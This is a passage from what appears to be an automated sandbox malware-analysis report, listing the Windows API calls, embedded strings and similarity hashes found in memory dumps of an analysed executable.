                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                  • API String ID: 323675364-22481851
                                                                                  • Opcode ID: 84d54d9c621ab7e3f403a68312a6de3d8b1a98d51a6b75cac661d0cd1c84cc89
                                                                                  • Instruction ID: 91f30d0003099c1abe6ed1c3c6b6600e87c64c605ae477b788eb394d17f21b0a
                                                                                  • Opcode Fuzzy Hash: 84d54d9c621ab7e3f403a68312a6de3d8b1a98d51a6b75cac661d0cd1c84cc89
                                                                                  • Instruction Fuzzy Hash: 4E411676D1022DABDF11EFA4EC85DEEB778FF24354B544129E801A71A1EB309E14CBA0
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00243C5C
                                                                                  • CoInitialize.OLE32(00000000), ref: 00243C8A
                                                                                  • CoUninitialize.OLE32 ref: 00243C94
                                                                                  • _wcslen.LIBCMT ref: 00243D2D
                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00243DB1
                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00243ED5
                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00243F0E
                                                                                  • CoGetObject.OLE32(?,00000000,0025FB98,?), ref: 00243F2D
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00243F40
                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00243FC4
                                                                                  • VariantClear.OLEAUT32(?), ref: 00243FD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 429561992-0
                                                                                  • Opcode ID: 6391f6be5ffb1f924c4534582b1dcf7eba9e6f19392b8dba4730708a7244abb0
                                                                                  • Instruction ID: 25f6b9ffad5b1ccfdb516284e4228fc614ccf54c02232eaf38b0c4b5a7b7ab60
                                                                                  • Opcode Fuzzy Hash: 6391f6be5ffb1f924c4534582b1dcf7eba9e6f19392b8dba4730708a7244abb0
                                                                                  • Instruction Fuzzy Hash: 57C15471A18301AFD704DF68C88492BBBE9FF89748F10491DF88A9B251D731EE15CB52
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00237AF3
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00237B8F
                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00237BA3
                                                                                  • CoCreateInstance.OLE32(0025FD08,00000000,00000001,00286E6C,?), ref: 00237BEF
                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00237C74
                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00237CCC
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00237D57
                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00237D7A
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00237D81
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00237DD6
                                                                                  • CoUninitialize.OLE32 ref: 00237DDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 2762341140-0
                                                                                  • Opcode ID: b89dc6a45fad3a6e286a4b3c6c77956d978cddb295aef95d9a47ccf9522d8d0f
                                                                                  • Instruction ID: 532dd6a3426f462f1d6682611d2d8aba2cf1e4942c86495e69762ad160b51361
                                                                                  • Opcode Fuzzy Hash: b89dc6a45fad3a6e286a4b3c6c77956d978cddb295aef95d9a47ccf9522d8d0f
                                                                                  • Instruction Fuzzy Hash: 14C11AB5A14209AFCB14DFA4D888DAEBBF9FF58304F148499E8159B361D730EE45CB90
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00255504
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00255515
                                                                                  • CharNextW.USER32(00000158), ref: 00255544
                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00255585
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0025559B
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002555AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CharNext
                                                                                  • String ID:
                                                                                  • API String ID: 1350042424-0
                                                                                  • Opcode ID: ad26555d9645179b84ca1381200a6a5c749fbf03a588c9dd73b62f12c089bb2d
                                                                                  • Instruction ID: 5c206494a9e692ef779894f70b0b6b0b1ebf83ec88ab432ee20f2afb8e958369
                                                                                  • Opcode Fuzzy Hash: ad26555d9645179b84ca1381200a6a5c749fbf03a588c9dd73b62f12c089bb2d
                                                                                  • Instruction Fuzzy Hash: BB618030920629EFDF108F94DC949FE7BB9FB09722F104145F925A7290D7748AA8DB64
                                                                                  APIs
                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0021FAAF
                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 0021FB08
                                                                                  • VariantInit.OLEAUT32(?), ref: 0021FB1A
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0021FB3A
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0021FB8D
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 0021FBA1
                                                                                  • VariantClear.OLEAUT32(?), ref: 0021FBB6
                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 0021FBC3
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021FBCC
                                                                                  • VariantClear.OLEAUT32(?), ref: 0021FBDE
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021FBE9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                  • String ID:
                                                                                  • API String ID: 2706829360-0
                                                                                  • Opcode ID: 752702f2deda07bae9ef90fed6fd0cdc2274cbc8a54fb1d0dd17bc159e3ca978
                                                                                  • Instruction ID: d9793908ee8822295c3b10843eb29955c91a863a62b05d301231888c4f9904e6
                                                                                  • Opcode Fuzzy Hash: 752702f2deda07bae9ef90fed6fd0cdc2274cbc8a54fb1d0dd17bc159e3ca978
                                                                                  • Instruction Fuzzy Hash: 36419274A103199FCB00DF64D858DEDBBB9FF18345F108029E815A7261D730EA46CF90
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00229CA1
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00229D22
                                                                                  • GetKeyState.USER32(000000A0), ref: 00229D3D
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00229D57
                                                                                  • GetKeyState.USER32(000000A1), ref: 00229D6C
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00229D84
                                                                                  • GetKeyState.USER32(00000011), ref: 00229D96
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00229DAE
                                                                                  • GetKeyState.USER32(00000012), ref: 00229DC0
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00229DD8
                                                                                  • GetKeyState.USER32(0000005B), ref: 00229DEA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 22fa1fa5b115a40d2249897be1617103ebdd6bad3cbfdaadbd1312bbc2695b0e
                                                                                  • Instruction ID: ff267d67544873e1af99f9ad214468a7b4c886142067d0800e0d9d320812b454
                                                                                  • Opcode Fuzzy Hash: 22fa1fa5b115a40d2249897be1617103ebdd6bad3cbfdaadbd1312bbc2695b0e
                                                                                  • Instruction Fuzzy Hash: 8C41E6345247DB7DFF309FE4A8043B5BEA0AF15304F44805BDAC6561C2EBA499E8C7A2
                                                                                  APIs
                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 002405BC
                                                                                  • inet_addr.WSOCK32(?), ref: 0024061C
                                                                                  • gethostbyname.WSOCK32(?), ref: 00240628
                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00240636
                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002406C6
                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002406E5
                                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 002407B9
                                                                                  • WSACleanup.WSOCK32 ref: 002407BF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                  • String ID: Ping
                                                                                  • API String ID: 1028309954-2246546115
                                                                                  • Opcode ID: d170ef2632ae135196527e5fc9e3b89f88186529c69f6e37533e328366889cda
                                                                                  • Instruction ID: c0aa1413bac2d4bda63e529af12bf0e8250dee5175c52811f7bb210b4a9b3a32
                                                                                  • Opcode Fuzzy Hash: d170ef2632ae135196527e5fc9e3b89f88186529c69f6e37533e328366889cda
                                                                                  • Instruction Fuzzy Hash: 21918C356143029FD324DF15D4C8F1ABBE4EF48318F1585A9E56A8B6A2C770ED91CF82
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$BuffCharLower
                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                  • API String ID: 707087890-567219261
                                                                                  • Opcode ID: d34e7d7cf3198bb4a594c762eb6ecfc20e92cf04dc7105e12e162247da4ce20c
                                                                                  • Instruction ID: 6f5876d37c850f9f30a5b47cfda784aed721fdd9e05c030747ff38976175ed5b
                                                                                  • Opcode Fuzzy Hash: d34e7d7cf3198bb4a594c762eb6ecfc20e92cf04dc7105e12e162247da4ce20c
                                                                                  • Instruction Fuzzy Hash: EE51AF31A315179BCB18EF68C9409BEB7A5BF64724B204229F826E72C4EB30DD60C790
                                                                                  APIs
                                                                                  • CoInitialize.OLE32 ref: 00243774
                                                                                  • CoUninitialize.OLE32 ref: 0024377F
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,0025FB78,?), ref: 002437D9
                                                                                  • IIDFromString.OLE32(?,?), ref: 0024384C
                                                                                  • VariantInit.OLEAUT32(?), ref: 002438E4
                                                                                  • VariantClear.OLEAUT32(?), ref: 00243936
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                  • API String ID: 636576611-1287834457
                                                                                  • Opcode ID: 1edc5194a28083ba8fa88e87c940b4e88abf90463b85e3c6d088947b5b6ebf05
                                                                                  • Instruction ID: 508e6f4f974ad45784f9d732b99898680e545a490249b97cc9e493b63722216f
                                                                                  • Opcode Fuzzy Hash: 1edc5194a28083ba8fa88e87c940b4e88abf90463b85e3c6d088947b5b6ebf05
                                                                                  • Instruction Fuzzy Hash: 8D61ACB0628301AFD314DF54D889F6AFBE8EF49711F100819F8859B291D7B0EE58CB92
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002333CF
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002333F0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString$_wcslen
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 4099089115-3080491070
                                                                                  • Opcode ID: 5c40dd56a4e765b5159a0c8562476f6dd5e2f029bde9d2f54546160ef4c805f9
                                                                                  • Instruction ID: eef8969a0ce7866eb4cdd3c251806b18892ca90ac18bf9f99d07a7c08b4ed2ae
                                                                                  • Opcode Fuzzy Hash: 5c40dd56a4e765b5159a0c8562476f6dd5e2f029bde9d2f54546160ef4c805f9
                                                                                  • Instruction Fuzzy Hash: 4251827191020ABADF15EBE0DD4AEEEB778AF24340F104169F50572092EB31AF68DF65
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                  • API String ID: 1256254125-769500911
                                                                                  • Opcode ID: 48db0ca3962f815ebbd2a50096d5dab2d0e5fffb066dcdb95366519069feb4d4
                                                                                  • Instruction ID: 5dd68f3553f78a99d962fee669587963aa7c2f907608a95a79e085262d3727c3
                                                                                  • Opcode Fuzzy Hash: 48db0ca3962f815ebbd2a50096d5dab2d0e5fffb066dcdb95366519069feb4d4
                                                                                  • Instruction Fuzzy Hash: 1741D832A21137ABCB116FFD98905BEB7A9BF70758B244129E461DB284E731CD91C790
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002353A0
                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00235416
                                                                                  • GetLastError.KERNEL32 ref: 00235420
                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 002354A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                  • API String ID: 4194297153-14809454
                                                                                  • Opcode ID: 06cdf62beeb2a78267224311072efdc6f08ad86aa82829958c22d43f931d9469
                                                                                  • Instruction ID: f0fbd037d78f12eca2494e4f067ec5783a1bd94e5d9e6b2f75aec68965bee191
                                                                                  • Opcode Fuzzy Hash: 06cdf62beeb2a78267224311072efdc6f08ad86aa82829958c22d43f931d9469
                                                                                  • Instruction Fuzzy Hash: AA31E3B5A206159FC714DF68C488FAABBF4FF14305F148069EA09CB292D770ED92CB90
                                                                                  APIs
                                                                                  • CreateMenu.USER32 ref: 00253C79
                                                                                  • SetMenu.USER32(?,00000000), ref: 00253C88
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00253D10
                                                                                  • IsMenu.USER32(?), ref: 00253D24
                                                                                  • CreatePopupMenu.USER32 ref: 00253D2E
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00253D5B
                                                                                  • DrawMenuBar.USER32 ref: 00253D63
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                  • String ID: 0$F
                                                                                  • API String ID: 161812096-3044882817
                                                                                  • Opcode ID: f615b3114ee6080b6ce6b2e3093e45621a1d9b0106276f343528161788f766f0
                                                                                  • Instruction ID: 31f2643b3bb6f603630496ad10e4331e5d54cc63e5245c9b77f0764bff8310da
                                                                                  • Opcode Fuzzy Hash: f615b3114ee6080b6ce6b2e3093e45621a1d9b0106276f343528161788f766f0
                                                                                  • Instruction Fuzzy Hash: 94415E75A1130AAFDB14CF94E848B9A77B5FF49351F140029FD46A7360E770AA24CF98
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00253A9D
                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00253AA0
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00253AC7
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00253AEA
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00253B62
                                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00253BAC
                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00253BC7
                                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00253BE2
                                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00253BF6
                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00253C13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 312131281-0
                                                                                  • Opcode ID: 94779a473324e093d37c027d2102877dbf38da158c098b8fccd87e7e1f5cf88d
                                                                                  • Instruction ID: 7b96b3e1e5cbaf79a9452154924597b34b1ff4caddb5e2a2a7d64aa2a4bd6848
                                                                                  • Opcode Fuzzy Hash: 94779a473324e093d37c027d2102877dbf38da158c098b8fccd87e7e1f5cf88d
                                                                                  • Instruction Fuzzy Hash: 18618875A00209AFDB11DFA8CC85EEE77B8EB09704F10009AFA15E72A1D770AE65DF54
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0022B151
                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B165
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0022B16C
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B17B
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0022B18D
                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B1A6
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B1B8
                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B1FD
                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B212
                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B21D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
